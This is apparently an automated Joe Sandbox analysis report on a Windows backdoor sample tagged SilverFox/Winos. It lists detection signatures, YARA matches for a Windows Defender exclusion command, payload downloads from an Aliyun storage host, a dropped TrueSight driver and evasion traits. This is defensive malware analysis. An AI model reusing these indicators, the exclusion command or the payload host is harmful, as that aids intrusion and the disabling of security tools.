Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2976587-987347589.07.exe

Overview

General Information

Sample name:2976587-987347589.07.exe
Analysis ID:1588710
MD5:67ab54b4fc69f4175d217dd57154a27c
SHA1:f753d5cf1dde05bd2b3417ddfcd12306219fdef3
SHA256:898349755ad447054ca99dc779c1f5b6c1dd4a7c0dcf1dda1d0e8bbaa6406b36
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Yara signature match

Classification

  • System is w10x64
  • 2976587-987347589.07.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\2976587-987347589.07.exe" MD5: 67AB54B4FC69F4175D217DD57154A27C)
  • CrwRQN.exe (PID: 7612 cmdline: C:\Users\user\Documents\CrwRQN.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • CrwRQN.exe (PID: 7616 cmdline: C:\Users\user\Documents\CrwRQN.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • CrwRQN.exe (PID: 5252 cmdline: C:\Users\user\Documents\CrwRQN.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
7.2.CrwRQN.exe.2780000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
6.2.CrwRQN.exe.2760000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
5.2.CrwRQN.exe.2850000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 2976587-987347589.07.exeVirustotal: Detection: 15%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.4:49914 version: TLS 1.2
Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.07.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: CrwRQN.exe, 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe, 00000005.00000000.2721668172.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe, 00000006.00000000.2730416851.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe, 00000006.00000002.2735939921.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe, 00000007.00000002.2955610290.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe, 00000007.00000000.2901467249.0000000140014000.00000002.00000001.01000000.00000008.sdmp, CrwRQN.exe.0.dr
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00007FFE1A4CA1B8 FindFirstFileExW,5_2_00007FFE1A4CA1B8
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DFFE
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDFF
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]5_2_0000000140011270
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DE96
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DEFB
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000E178
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDD9
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: 662hfg.oss-cn-beijing.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 189atohci.sys.0.dr, CrwRQN.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: 189atohci.sys.0.dr, CrwRQN.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: CrwRQN.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: CrwRQN.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: CrwRQN.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: CrwRQN.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: CrwRQN.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: CrwRQN.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: CrwRQN.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: CrwRQN.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: CrwRQN.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: CrwRQN.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: CrwRQN.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: CrwRQN.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: CrwRQN.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 189atohci.sys.0.dr, CrwRQN.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: CrwRQN.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 189atohci.sys.0.dr, CrwRQN.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 189atohci.sys.0.dr, CrwRQN.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: CrwRQN.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: CrwRQN.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: CrwRQN.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: 2976587-987347589.07.exe, 00000000.00000003.2585993432.0000000000D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/
Source: 2976587-987347589.07.exe, 00000000.00000003.2565461564.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585993432.0000000000D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002
Source: 2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585933323.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2565397407.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/M
Source: 2976587-987347589.07.exe, 00000000.00000003.2565397407.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif
Source: 2976587-987347589.07.exe, 00000000.00000003.2565397407.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifC
Source: 2976587-987347589.07.exe, 00000000.00000003.2565397407.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifW
Source: 2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/b.gif
Source: 2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/b.gifL
Source: 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/b.gifg
Source: 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif
Source: 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif(
Source: 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif
Source: 2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585933323.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2565397407.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/ess.aliyuncs.com
Source: 2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585933323.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/i
Source: 2976587-987347589.07.exe, 00000000.00000003.2565461564.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585993432.0000000000D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/k
Source: 2976587-987347589.07.exe, 00000000.00000003.2585874277.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2625717247.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2585933323.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2565397407.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/o
Source: 2976587-987347589.07.exe, 00000000.00000003.2585993432.0000000000D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/werShell
Source: CrwRQN.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: CrwRQN.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: CrwRQN.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: CrwRQN.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownHTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.4:49914 version: TLS 1.2

System Summary

barindex
Source: 7.2.CrwRQN.exe.2780000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 6.2.CrwRQN.exe.2760000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 5.2.CrwRQN.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140006C95 NtAllocateVirtualMemory,5_2_0000000140006C95
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_000000014000C3F05_2_000000014000C3F0
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_000000014000CC005_2_000000014000CC00
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140001A305_2_0000000140001A30
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_000000014000C2A05_2_000000014000C2A0
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00000001400022C05_2_00000001400022C0
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00000001400110F05_2_00000001400110F0
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140010CF05_2_0000000140010CF0
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00000001400093005_2_0000000140009300
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_000000014000BB705_2_000000014000BB70
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140003F805_2_0000000140003F80
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00000001400103D05_2_00000001400103D0
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00007FFE1A4D02485_2_00007FFE1A4D0248
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_00007FFE1A4CA1B85_2_00007FFE1A4CA1B8
Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\CrwRQN.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: 7.2.CrwRQN.exe.2780000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 6.2.CrwRQN.exe.2760000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 5.2.CrwRQN.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal80.evad.winEXE@4/12@1/1
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
Source: C:\Users\user\Documents\CrwRQN.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,5_2_0000000140001430
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Documents\CrwRQN.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].datJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Users\user\Documents\CrwRQN.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: 2976587-987347589.07.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2976587-987347589.07.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 2976587-987347589.07.exeVirustotal: Detection: 15%
Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile read: C:\Users\user\Desktop\2976587-987347589.07.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\2976587-987347589.07.exe "C:\Users\user\Desktop\2976587-987347589.07.exe"
Source: unknownProcess created: C:\Users\user\Documents\CrwRQN.exe C:\Users\user\Documents\CrwRQN.exe
Source: unknownProcess created: C:\Users\user\Documents\CrwRQN.exe C:\Users\user\Documents\CrwRQN.exe
Source: unknownProcess created: C:\Users\user\Documents\CrwRQN.exe C:\Users\user\Documents\CrwRQN.exe
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\CrwRQN.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.07.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: 2976587-987347589.07.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 2976587-987347589.07.exeStatic file information: File size 30887936 > 1048576
Source: 2976587-987347589.07.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200
Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 2976587-987347589.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.07.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
